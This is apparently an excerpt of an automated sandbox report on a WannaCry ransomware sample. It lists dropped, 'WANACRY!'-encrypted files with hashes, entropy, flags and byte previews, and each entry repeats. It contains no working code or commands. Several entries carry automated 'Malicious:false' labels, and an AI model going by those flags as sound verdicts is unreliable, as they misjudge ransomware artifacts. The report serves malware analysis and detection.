                                                                                      Encrypted:false
                                                                                      SSDEEP:96:om0+rPaQMEZv95NyyvvZ83hD+Gs0lf+c7oXamczD7J0KUcsszXo7:4+r2u5yyotHlWBqitWo7
                                                                                      MD5:BE044478132E9DE1B63217B35EAA4D14
                                                                                      SHA1:5A09B02C3BBEDAD830813AC058459F2B8DEACD02
                                                                                      SHA-256:E529EC375C5DBA43B2D8272F194F9A4115A9FB1D0DF3B395C001597B4586E2BD
                                                                                      SHA-512:3A8AE8880C53CCF7214EAEE2573A4AEB4D3D9BD6F2ECD3114962B877C5526F5822C618F05CF48F6ADD5E9F81F9516C71081F1073F1A54EAB7F80E29E7D5FE852
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....}.wa..v".#e..{.}-.YF........D.;.d..;..;-.x?*|....#E........}..1RT..T.X.......b!#e@}.. ..&[~T.x.?i.W.J.'.b.........Z.......\....9.{..r.s.........$..D.x.....Pf~..f..a7~o....".=%..ix0U. c...ECE.....v..z.3G.......E.?C....J...H`.1Y9R......{f............k..<.S..!........dl.F...'b?..?.75.O.#h.......1.U.'.....U.[.`.9..*n(I.`..?..".....DxB<.l.T.c..W.n....2\.l...n,V....i'..O.$.NR.6..#.&@._....._...H.Bm.#&B.......Qg[......M[.3....W..G=.agR.}n.......R...Ny.....{.I....K.....E;............Z..k~/T(.{.%..l....G..+.......W.\./Z...L....A.o....~...{.b*.300....W9....Z..5i.M![=4Y_W...+o....\.~]...../Z.{....Z.mX.$p......#..!.....u.O.A./......#.+..vn0...6..5...?<u:.#HU.&...9k...K.j..l..qI2.._.7.h.'...b`...o..";WH.......lc....`[.Z.M..Ps.....Kp-.....t.....D@/i..Y..EO!%l..>J.....7zN./..E. .l..=...T.....Z5..a....,.......;...uZ>.....@.......r.-H*P.?.S..Q3X...T-=}....BCd.K....C.V..0.6tU....l..&$..@.Z.tG.\L.3.H....t][_A#..."Q{o..x.p..i-.).C...T[i
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6136
                                                                                      Entropy (8bit):7.97104411620675
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:om0+rPaQMEZv95NyyvvZ83hD+Gs0lf+c7oXamczD7J0KUcsszXo7:4+r2u5yyotHlWBqitWo7
                                                                                      MD5:BE044478132E9DE1B63217B35EAA4D14
                                                                                      SHA1:5A09B02C3BBEDAD830813AC058459F2B8DEACD02
                                                                                      SHA-256:E529EC375C5DBA43B2D8272F194F9A4115A9FB1D0DF3B395C001597B4586E2BD
                                                                                      SHA-512:3A8AE8880C53CCF7214EAEE2573A4AEB4D3D9BD6F2ECD3114962B877C5526F5822C618F05CF48F6ADD5E9F81F9516C71081F1073F1A54EAB7F80E29E7D5FE852
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....}.wa..v".#e..{.}-.YF........D.;.d..;..;-.x?*|....#E........}..1RT..T.X.......b!#e@}.. ..&[~T.x.?i.W.J.'.b.........Z.......\....9.{..r.s.........$..D.x.....Pf~..f..a7~o....".=%..ix0U. c...ECE.....v..z.3G.......E.?C....J...H`.1Y9R......{f............k..<.S..!........dl.F...'b?..?.75.O.#h.......1.U.'.....U.[.`.9..*n(I.`..?..".....DxB<.l.T.c..W.n....2\.l...n,V....i'..O.$.NR.6..#.&@._....._...H.Bm.#&B.......Qg[......M[.3....W..G=.agR.}n.......R...Ny.....{.I....K.....E;............Z..k~/T(.{.%..l....G..+.......W.\./Z...L....A.o....~...{.b*.300....W9....Z..5i.M![=4Y_W...+o....\.~]...../Z.{....Z.mX.$p......#..!.....u.O.A./......#.+..vn0...6..5...?<u:.#HU.&...9k...K.j..l..qI2.._.7.h.'...b`...o..";WH.......lc....`[.Z.M..Ps.....Kp-.....t.....D@/i..Y..EO!%l..>J.....7zN./..E. .l..=...T.....Z5..a....,.......;...uZ>.....@.......r.-H*P.?.S..Q3X...T-=}....BCd.K....C.V..0.6tU....l..&$..@.Z.tG.\L.3.H....t][_A#..."Q{o..x.p..i-.).C...T[i
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.611562121011
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEHasuRNqeYRvipQjPtN7DAL10+zmODPF1t/izDHJ9KueOVU8YCycX/LM:bkgBWNqeYGQztFDy1dm09bKnHJEMYCyH
                                                                                      MD5:BBB6E2FC4118D579E586988593207E7A
                                                                                      SHA1:E064791DC27FE7456EAE9BB8D957B60565188D5C
                                                                                      SHA-256:870B17F3151F03B2FEB88DD6FB2FD311C415C5AC18812F008ADF93C1483F388B
                                                                                      SHA-512:7D51CC77331C8ECBAF633494F059A5F4B77EAEB848B4A4C559E5ADF0EB2A629B1122E075AF637CB0294F9CFD8248EDC744A0F80F73D7A223A51A6EB037EC9FA8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......ls<...y..4...O..l....q...M..4XL......d.M..RgO..,....,...._d ...45......%.;....P...v.{+E.....]........o,....H.[^6.W...Emu..:Nj..........K..E..$...<...u>..).Ue.....P...(.........j.ad..V...s0.k...Z).............I.........W.\.?.V........)..d)IJ....'.......Ku...."..$..B.......7~..G..?.~|j....lQ...b....vo.9/.I..x..b+/....Z.Ub...}l0..f....!.Y..uU.JV..GF..4.e.3......b(M.....bH}...;.P..5...1"..H..Hw.X.1.x5/...,......Fa2T....2........=.%.....L.K.[A....ktj.M5g_h.2...C.....K.;T.h.'..e.8\,.'..Y|..9AV.E4....;p.q#...g..x.OQ.....9.M..-...w.........ul
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.611562121011
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEHasuRNqeYRvipQjPtN7DAL10+zmODPF1t/izDHJ9KueOVU8YCycX/LM:bkgBWNqeYGQztFDy1dm09bKnHJEMYCyH
                                                                                      MD5:BBB6E2FC4118D579E586988593207E7A
                                                                                      SHA1:E064791DC27FE7456EAE9BB8D957B60565188D5C
                                                                                      SHA-256:870B17F3151F03B2FEB88DD6FB2FD311C415C5AC18812F008ADF93C1483F388B
                                                                                      SHA-512:7D51CC77331C8ECBAF633494F059A5F4B77EAEB848B4A4C559E5ADF0EB2A629B1122E075AF637CB0294F9CFD8248EDC744A0F80F73D7A223A51A6EB037EC9FA8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......ls<...y..4...O..l....q...M..4XL......d.M..RgO..,....,...._d ...45......%.;....P...v.{+E.....]........o,....H.[^6.W...Emu..:Nj..........K..E..$...<...u>..).Ue.....P...(.........j.ad..V...s0.k...Z).............I.........W.\.?.V........)..d)IJ....'.......Ku...."..$..B.......7~..G..?.~|j....lQ...b....vo.9/.I..x..b+/....Z.Ub...}l0..f....!.Y..uU.JV..GF..4.e.3......b(M.....bH}...;.P..5...1"..H..Hw.X.1.x5/...,......Fa2T....2........=.%.....L.K.[A....ktj.M5g_h.2...C.....K.;T.h.'..e.8\,.'..Y|..9AV.E4....;p.q#...g..x.OQ.....9.M..-...w.........ul
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):363208
                                                                                      Entropy (8bit):7.999566654268545
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:pAW5EVsmPHIVwUq97Whb9u6ny886quNfib7rY0hnYcjKGwE8dm7i+N7mI:1KsIIVwUqJQb9d0Vbvf7jKE7iSh
                                                                                      MD5:FFBABA6C543E764C531E727A24B064A6
                                                                                      SHA1:165650A0622B3104DBB48C99490774924E5D7662
                                                                                      SHA-256:E535D0EF45C7BE863F39CF7995D975919C88E4E76C0C4C58F49D1D2D34009B81
                                                                                      SHA-512:585F65547444B2DF304D7FBF9B7406E109957C162494E2E5E079EFD81E7050536F7CE3C915F18290A4307B8EAA361E4F4392B369A44523A8DE0C9B6E608EFD8F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......"...P....*...3.U*.......MOr..mX=..V.Il.$-...g.o.T..5x....q.W...&i]D.'.i.!%BI....J(..#..*.8..m.ke.L.yDi.29.@.7C....Go..m1..5."...I\..6+..@..0..0z.'v....;..O...4/......>b..CK.t6.........7;Q......hQ..;...W.u}_. ..X.R7...#..r.\w1.D.6-ET.c......$G................,..mO9i:bmd...}..:aR](..p..K.=X.M...Bi.q...\.F...6.{.`...e........\....le.1...ua....8>...5..>.... .9<.p..."..D.C..{\.6...R...^...@.b..|.<k.i..O.*.....e.[0h...&0..!..1...h.j).}.2..W.f...)..2.N@.[\...d....k........X.}nM4.89Z.........._.E.....^V.T_R..X.W2...d.2..X..(.'..z.]6j.F........#..L...._..3.k.).yT.../.Kx.5q..q..b5....A.*..84..\.J.Z'..$.c.m#.KC.(.E.K.f......~...m.y..Jx.Pq...(..z.]......w....=....U...Q....m.)@$\......t...c...HG..}.."......A@....i.7..O/.!...."...?M^u.%....^.....3.O.NwO.............,O...#.I.@....\..i.~.|!U....b......,..Eze.$.U....i.H.tG..o...gd..E....kH.^..........9".....]<..%....JI..$.c..6.....".*0wE..!..p...n..J\Q..Y..o..0.Ji......'...P.....F..p...g....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):363208
                                                                                      Entropy (8bit):7.999566654268545
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:pAW5EVsmPHIVwUq97Whb9u6ny886quNfib7rY0hnYcjKGwE8dm7i+N7mI:1KsIIVwUqJQb9d0Vbvf7jKE7iSh
                                                                                      MD5:FFBABA6C543E764C531E727A24B064A6
                                                                                      SHA1:165650A0622B3104DBB48C99490774924E5D7662
                                                                                      SHA-256:E535D0EF45C7BE863F39CF7995D975919C88E4E76C0C4C58F49D1D2D34009B81
                                                                                      SHA-512:585F65547444B2DF304D7FBF9B7406E109957C162494E2E5E079EFD81E7050536F7CE3C915F18290A4307B8EAA361E4F4392B369A44523A8DE0C9B6E608EFD8F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......"...P....*...3.U*.......MOr..mX=..V.Il.$-...g.o.T..5x....q.W...&i]D.'.i.!%BI....J(..#..*.8..m.ke.L.yDi.29.@.7C....Go..m1..5."...I\..6+..@..0..0z.'v....;..O...4/......>b..CK.t6.........7;Q......hQ..;...W.u}_. ..X.R7...#..r.\w1.D.6-ET.c......$G................,..mO9i:bmd...}..:aR](..p..K.=X.M...Bi.q...\.F...6.{.`...e........\....le.1...ua....8>...5..>.... .9<.p..."..D.C..{\.6...R...^...@.b..|.<k.i..O.*.....e.[0h...&0..!..1...h.j).}.2..W.f...)..2.N@.[\...d....k........X.}nM4.89Z.........._.E.....^V.T_R..X.W2...d.2..X..(.'..z.]6j.F........#..L...._..3.k.).yT.../.Kx.5q..q..b5....A.*..84..\.J.Z'..$.c.m#.KC.(.E.K.f......~...m.y..Jx.Pq...(..z.]......w....=....U...Q....m.)@$\......t...c...HG..}.."......A@....i.7..O/.!...."...?M^u.%....^.....3.O.NwO.............,O...#.I.@....\..i.~.|!U....b......,..Eze.$.U....i.H.tG..o...gd..E....kH.^..........9".....]<..%....JI..$.c..6.....".*0wE..!..p...n..J\Q..Y..o..0.Ji......'...P.....F..p...g....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1336
                                                                                      Entropy (8bit):7.8350076558433255
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkIJlykTfEbPs6cDpnYHkU5IPCqTT/dWXyCXUm1lURaWMbE4YAd0d:bkIJXfwjkpYEzCIVWXyCR1lURMbWAdu
                                                                                      MD5:9DE0C4A2A2E91D39F2323869FEEBFDB8
                                                                                      SHA1:B18A8A168523A152400155CCAF52DBD3C0680774
                                                                                      SHA-256:75D45C4976398D1DDAFA0929B0481CFE5371C81F99654811596585C2B833E357
                                                                                      SHA-512:065D8D39D5F991792218D4DF486EC1C8B1F436D254A5F444A604F01651DDF2D4E4A203E205DAA1425D4EC1DF7C58A6A8901CB21FB28D5BCEC581BB4BFAC55D08
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....s$.kk-./......!.......8.J.h.a..AD..).Oqx.K..K...F.!..m.G0...q.8.+..V.e.R...jZ^...o..U.....(.....+@..J_..'jR.pF..D.!.8..7v.<...~....<.|.O..eB.d..OY..k=da...}=...+oL.>.....sS.P 1.>N.g..'.B...2...x....4z..N....M...*..d.x..ga6.g......mo...I.gB.............V..o.)%o.`.t.Y..R.'..$u....`.-.|...i...\..)1.Qm.0R$...).3..V....h.z...G..{O#..S.\]f.. .)01..Z.t.P.J..I6C1B....[o&."...........(]......jF...b..9P)..5..AW. ...<P4...(....),..<.H.=.{2..1LE.!e..D......wU{|_.Jv...4.....~z.....<...t(.....c....2x.U*.s...nR.gJ)....h.y.2.4/Z.}uk.{.H.#...p..=. ......?...i..>.};...Q6l...........%..U..}40..:.Q.F...E.Gs..[.2.1S..I@a..lV.#.!.z.{......<.<..l.=.@....-....Z...%?G..A+;..y?$F....|.{.....wL.tt.....?5.R.boa..."..d.T?...d.]......#x..g.J..esD{f.N.g ....8J.o....m..M.MO..%.L..C....7 ).....!Yf.!.6.8....q.H.O[<...2=......S..Hq.....?J.O.I..t.P...r....B)..P......{._{Y.........+T.'.E..-.AE./v.m.=M...$m..K.V..].2.(._6.k\....4.3...e....e(^.y5.v....B.j....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1336
                                                                                      Entropy (8bit):7.8350076558433255
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkIJlykTfEbPs6cDpnYHkU5IPCqTT/dWXyCXUm1lURaWMbE4YAd0d:bkIJXfwjkpYEzCIVWXyCR1lURMbWAdu
                                                                                      MD5:9DE0C4A2A2E91D39F2323869FEEBFDB8
                                                                                      SHA1:B18A8A168523A152400155CCAF52DBD3C0680774
                                                                                      SHA-256:75D45C4976398D1DDAFA0929B0481CFE5371C81F99654811596585C2B833E357
                                                                                      SHA-512:065D8D39D5F991792218D4DF486EC1C8B1F436D254A5F444A604F01651DDF2D4E4A203E205DAA1425D4EC1DF7C58A6A8901CB21FB28D5BCEC581BB4BFAC55D08
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....s$.kk-./......!.......8.J.h.a..AD..).Oqx.K..K...F.!..m.G0...q.8.+..V.e.R...jZ^...o..U.....(.....+@..J_..'jR.pF..D.!.8..7v.<...~....<.|.O..eB.d..OY..k=da...}=...+oL.>.....sS.P 1.>N.g..'.B...2...x....4z..N....M...*..d.x..ga6.g......mo...I.gB.............V..o.)%o.`.t.Y..R.'..$u....`.-.|...i...\..)1.Qm.0R$...).3..V....h.z...G..{O#..S.\]f.. .)01..Z.t.P.J..I6C1B....[o&."...........(]......jF...b..9P)..5..AW. ...<P4...(....),..<.H.=.{2..1LE.!e..D......wU{|_.Jv...4.....~z.....<...t(.....c....2x.U*.s...nR.gJ)....h.y.2.4/Z.}uk.{.H.#...p..=. ......?...i..>.};...Q6l...........%..U..}40..:.Q.F...E.Gs..[.2.1S..I@a..lV.#.!.z.{......<.<..l.=.@....-....Z...%?G..A+;..y?$F....|.{.....wL.tt.....?5.R.boa..."..d.T?...d.]......#x..g.J..esD{f.N.g ....8J.o....m..M.MO..%.L..C....7 ).....!Yf.!.6.8....q.H.O[<...2=......S..Hq.....?J.O.I..t.P...r....B)..P......{._{Y.........+T.'.E..-.AE./v.m.=M...$m..K.V..].2.(._6.k\....4.3...e....e(^.y5.v....B.j....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1608
                                                                                      Entropy (8bit):7.901753325965466
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkxcpqq8HoS0es+j9EZNYo1gQaSHk2pMMhHG329szYUj2PlRZtnBK5mSUCuvFOM9:bkkg61g0E2pKEbUiPVtc5mSYs1b4
                                                                                      MD5:5BA132FBA7417FBF61839CC826152CD1
                                                                                      SHA1:DD9CCA4D1E55192EED72CD26C5FA5E9CAC3B7BFC
                                                                                      SHA-256:09AB84CB005FFE38FD1C649C44ACB642464C002230078616B46E40D801485F12
                                                                                      SHA-512:CD5E952C55F0F94F36199B97FEAF3B854EDF2F8A3AB692F3323ADF6FC226B0FD1A538E4CC64B691BC1E96F1E41B66729948DFBCD036EAB1B00EAED5944E7D972
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....C.....9{..T.h.4.wQf>.=......N.@.....fm.o;..:]LA.Kr.I....q..Zg..Y..o.ec.....%.s......R......,...3.P.C9..%...c..[.".O.....g..\.>g]5..n....J.3......h.\..@>.s....n....._.xj..H..H.Nt.!~......-....$..l...7..fFH.U.iy..).b....R....SZ.\...6....`.SZ.%*....%.......{.-..#%......H.[.C...p3...kn.&>U.`w.!>@.5e.M...t.W....rL="c......p..N.....b..l..G.....(N...._.....)1'.U..+..|.b.|.ls.$.....qNS..`2...S...#;...AO..#hu._......+^8.........v..DYot.]_.r.d".`..+N....k....QzmA|.4.f.......t.d.......O....Y..y4..d.Z1.W&..dqOy.01mi`2f....i....u.)YX.cT..v.ZR.Y.3.J..p8..6Z.....\0.y....v....?..)..G.G........1.0.y.a.. ...zl..Ja.t......Q.....M.._w.f.K....F..8....<.>^O...g...$..%..y..X._B#..2....K?m..1.x..Z|...8..k.:...EJs._...I....C ....G.....v..0x..J....H{.=hc.9..X..|z.#..A^pC..|..i.g%..k.....F.....A.LY...U.".H<T$.f..t_.:C.u..xT/$.;t5G.h.....AZ.}.(......h..r......RlV.u^(.Ce.....#..Y..C.....6..}E.`.X .+.HS..N.y..,g.?.~n>.b..3..{..d.....9..=..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1608
                                                                                      Entropy (8bit):7.901753325965466
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkxcpqq8HoS0es+j9EZNYo1gQaSHk2pMMhHG329szYUj2PlRZtnBK5mSUCuvFOM9:bkkg61g0E2pKEbUiPVtc5mSYs1b4
                                                                                      MD5:5BA132FBA7417FBF61839CC826152CD1
                                                                                      SHA1:DD9CCA4D1E55192EED72CD26C5FA5E9CAC3B7BFC
                                                                                      SHA-256:09AB84CB005FFE38FD1C649C44ACB642464C002230078616B46E40D801485F12
                                                                                      SHA-512:CD5E952C55F0F94F36199B97FEAF3B854EDF2F8A3AB692F3323ADF6FC226B0FD1A538E4CC64B691BC1E96F1E41B66729948DFBCD036EAB1B00EAED5944E7D972
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....C.....9{..T.h.4.wQf>.=......N.@.....fm.o;..:]LA.Kr.I....q..Zg..Y..o.ec.....%.s......R......,...3.P.C9..%...c..[.".O.....g..\.>g]5..n....J.3......h.\..@>.s....n....._.xj..H..H.Nt.!~......-....$..l...7..fFH.U.iy..).b....R....SZ.\...6....`.SZ.%*....%.......{.-..#%......H.[.C...p3...kn.&>U.`w.!>@.5e.M...t.W....rL="c......p..N.....b..l..G.....(N...._.....)1'.U..+..|.b.|.ls.$.....qNS..`2...S...#;...AO..#hu._......+^8.........v..DYot.]_.r.d".`..+N....k....QzmA|.4.f.......t.d.......O....Y..y4..d.Z1.W&..dqOy.01mi`2f....i....u.)YX.cT..v.ZR.Y.3.J..p8..6Z.....\0.y....v....?..)..G.G........1.0.y.a.. ...zl..Ja.t......Q.....M.._w.f.K....F..8....<.>^O...g...$..%..y..X._B#..2....K?m..1.x..Z|...8..k.:...EJs._...I....C ....G.....v..0x..J....H{.=hc.9..X..|z.#..A^pC..|..i.g%..k.....F.....A.LY...U.".H<T$.f..t_.:C.u..xT/$.;t5G.h.....AZ.}.(......h..r......RlV.u^(.Ce.....#..Y..C.....6..}E.`.X .+.HS..N.y..,g.?.~n>.b..3..{..d.....9..=..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):493400
                                                                                      Entropy (8bit):7.999626783378529
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:kGbxU1Ku+NuvnyrqyIjAPp5X09qpO+8CgAg8cAA:kGNU1Ku+Ngy2rAnDo/Ag0A
                                                                                      MD5:17A5F32A52EAEBD6F09C6DB4AC60729B
                                                                                      SHA1:E2724C28C55A4917C574B9DE820D34A4AD59D348
                                                                                      SHA-256:C33CB95FC9D94BC79F5BD812DF4BF2A821B04AF6FCD9D4E20A5023E87D7FB1FA
                                                                                      SHA-512:D96709945AC67DA92F3004907A6598955FB25A7EA1A0FF9032D2AD5AD5E653CC173D7E2A132DAB00F357990C17C32924CAF8803A01D066EDB84C4194B6E1E298
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......AMX.;../...Grrr.-r.?oB..d9...H...7h'..?F.@0A.!........D.9S^.c..3...s..n..;_Gqb..k.by...O.K<.A...e..XQg....u.....f.`.T...a...#"..2..7...b.>..3.$.....S7.r..y..gU=..aK...xzM....M....s...KY.r`....hQ.>...L^.....;..I(..N...ji;.q=..6x^.Z{#...J-..@A..:..j.....2.......\..-t..{c|3.j.L.k......+d.9IO.oi^R.,>....u........R..J.....Uu.7tG8K{.p.....6.q.J...... ..D...@..q>6|0.k.&V;!f...Tx....E.vrS..IP.."..2O.uC.....j.J.x..S.#..n$5....1.+}`....Jk..S?.....K..=.+s...........x.{.`L.j...Z.....o....4s..qH..<..k.g g....%4.[...A.TZ^Xq....!.... Mce......Z.........[G...&}.|t.QW0M...8.......4.Y[..'[l...{...|...L?v.G;.......3...(...t=V.uO'0..I-.......#..."...7.i....|QK.[...s.;...K.a.J..Y%4os.o..(B.......P..1t.h. ..8...#...y...7.....fF....W.pR..f7f..,r...G..H....W.\0S.z,..T....:.6.N..:e).b......G4.~.ol...............`._.CA.(;...#0.;..".o.r.R.g.Lx...............~?...6..P.m."..S.]..].A/.....F.B..}2..T..+.....Z.z>.[y...I.>..../.......~.4..O......@..\.....=.;2.........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):493400
                                                                                      Entropy (8bit):7.999626783378529
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:kGbxU1Ku+NuvnyrqyIjAPp5X09qpO+8CgAg8cAA:kGNU1Ku+Ngy2rAnDo/Ag0A
                                                                                      MD5:17A5F32A52EAEBD6F09C6DB4AC60729B
                                                                                      SHA1:E2724C28C55A4917C574B9DE820D34A4AD59D348
                                                                                      SHA-256:C33CB95FC9D94BC79F5BD812DF4BF2A821B04AF6FCD9D4E20A5023E87D7FB1FA
                                                                                      SHA-512:D96709945AC67DA92F3004907A6598955FB25A7EA1A0FF9032D2AD5AD5E653CC173D7E2A132DAB00F357990C17C32924CAF8803A01D066EDB84C4194B6E1E298
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......AMX.;../...Grrr.-r.?oB..d9...H...7h'..?F.@0A.!........D.9S^.c..3...s..n..;_Gqb..k.by...O.K<.A...e..XQg....u.....f.`.T...a...#"..2..7...b.>..3.$.....S7.r..y..gU=..aK...xzM....M....s...KY.r`....hQ.>...L^.....;..I(..N...ji;.q=..6x^.Z{#...J-..@A..:..j.....2.......\..-t..{c|3.j.L.k......+d.9IO.oi^R.,>....u........R..J.....Uu.7tG8K{.p.....6.q.J...... ..D...@..q>6|0.k.&V;!f...Tx....E.vrS..IP.."..2O.uC.....j.J.x..S.#..n$5....1.+}`....Jk..S?.....K..=.+s...........x.{.`L.j...Z.....o....4s..qH..<..k.g g....%4.[...A.TZ^Xq....!.... Mce......Z.........[G...&}.|t.QW0M...8.......4.Y[..'[l...{...|...L?v.G;.......3...(...t=V.uO'0..I-.......#..."...7.i....|QK.[...s.;...K.a.J..Y%4os.o..(B.......P..1t.h. ..8...#...y...7.....fF....W.pR..f7f..,r...G..H....W.\0S.z,..T....:.6.N..:e).b......G4.~.ol...............`._.CA.(;...#0.;..".o.r.R.g.Lx...............~?...6..P.m."..S.]..].A/.....F.B..}2..T..+.....Z.z>.[y...I.>..../.......~.4..O......@..\.....=.;2.........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.609922180350987
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEt3PN4f9gmXu8ew3wlKLO8d0rZGdvgk43biXakgGtmOVKExmlrUqV++n:bk4fNEkwNLOMcMiTTjSmloe
                                                                                      MD5:A7C15DF09114F59CD60730D0B5FBA62C
                                                                                      SHA1:7CD088EA1034DA739E95D0F2EA1149C2F52CCCA2
                                                                                      SHA-256:56FE249A6160F1762D33EBA76BF57D45AC081D8E4A85D709C316B533912F21C0
                                                                                      SHA-512:91DCB4646BAD14B9893022452196674A598C01EFEDD9E9D5F959497000B5C8071EC3810D45B9CCBFAE9D95120218794B618C3EFBD3A522E22977AE0108A40319
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........{s@...o....~..?.bA..'..%...m`M}F...c....5..L7...1.....5$....L0.sx...s^.P:..5.U.<!.!.%. ..q....V..."a-...........W.........V..q..Z........9X.?..vUx}Z.v...I.&\$x.y|`..z.....U.4...).)>... ..9..'.T.,....u.....Y(..@...f.J/Z.O.1..:....Q.{..........]....'.........sQ,.......hY*}.....-K5....'........h.4..!......DTO.q%....z.....].uS..;=..:.g.Sm..EQ.F....b...c..LY....[U.<.l;f...Q.A.T."T...SB.|.....L..|./.G|o.&"......@L.rW.L.k.........o.. s..m7....\&4.h...b/.<.'.>.8....w..Z....dMz.....U..S8.SE?.5 A\..<....b?.....c..N..GC...+).5...ki.G../...I..a.zg
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.609922180350987
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEt3PN4f9gmXu8ew3wlKLO8d0rZGdvgk43biXakgGtmOVKExmlrUqV++n:bk4fNEkwNLOMcMiTTjSmloe
                                                                                      MD5:A7C15DF09114F59CD60730D0B5FBA62C
                                                                                      SHA1:7CD088EA1034DA739E95D0F2EA1149C2F52CCCA2
                                                                                      SHA-256:56FE249A6160F1762D33EBA76BF57D45AC081D8E4A85D709C316B533912F21C0
                                                                                      SHA-512:91DCB4646BAD14B9893022452196674A598C01EFEDD9E9D5F959497000B5C8071EC3810D45B9CCBFAE9D95120218794B618C3EFBD3A522E22977AE0108A40319
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........{s@...o....~..?.bA..'..%...m`M}F...c....5..L7...1.....5$....L0.sx...s^.P:..5.U.<!.!.%. ..q....V..."a-...........W.........V..q..Z........9X.?..vUx}Z.v...I.&\$x.y|`..z.....U.4...).)>... ..9..'.T.,....u.....Y(..@...f.J/Z.O.1..:....Q.{..........]....'.........sQ,.......hY*}.....-K5....'........h.4..!......DTO.q%....z.....].uS..;=..:.g.Sm..EQ.F....b...c..LY....[U.<.l;f...Q.A.T."T...SB.|.....L..|./.G|o.&"......@L.rW.L.k.........o.. s..m7....\&4.h...b/.<.'.>.8....w..Z....dMz.....U..S8.SE?.5 A\..<....b?.....c..N..GC...+).5...ki.G../...I..a.zg
